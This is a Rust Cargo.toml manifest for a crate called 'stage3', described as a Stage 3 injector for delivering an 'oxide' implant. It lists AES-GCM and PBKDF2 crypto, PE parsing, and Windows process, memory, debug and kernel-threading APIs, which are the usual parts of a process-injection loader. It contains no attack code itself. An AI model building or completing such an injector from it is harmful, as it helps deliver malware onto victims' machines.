[package]
name = "stage3"
version = "0.1.0"
edition = "2021"
authors = ["diemoeve"]
description = "Stage 3 injector for oxide implant delivery"

[dependencies]
# Crypto (oxide-compatible)
aes-gcm = "0.10"
pbkdf2 = "0.12"
sha2 = "0.10"

# Error handling
thiserror = "1.0"

# PE parsing
goblin = { version = "0.8", default-features = false, features = ["pe64", "std"] }

[target.'cfg(windows)'.dependencies]
windows-sys = { version = "0.59", features = [
    "Win32_Foundation",
    "Win32_System_Threading",
    "Win32_System_Memory",
    "Win32_System_Diagnostics_ToolHelp",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_LibraryLoader",
    "Win32_System_Kernel",
    "Wdk",
    "Wdk_System_Threading",
] }

[profile.release]
opt-level = "s"
lto = true
strip = true
panic = "abort"
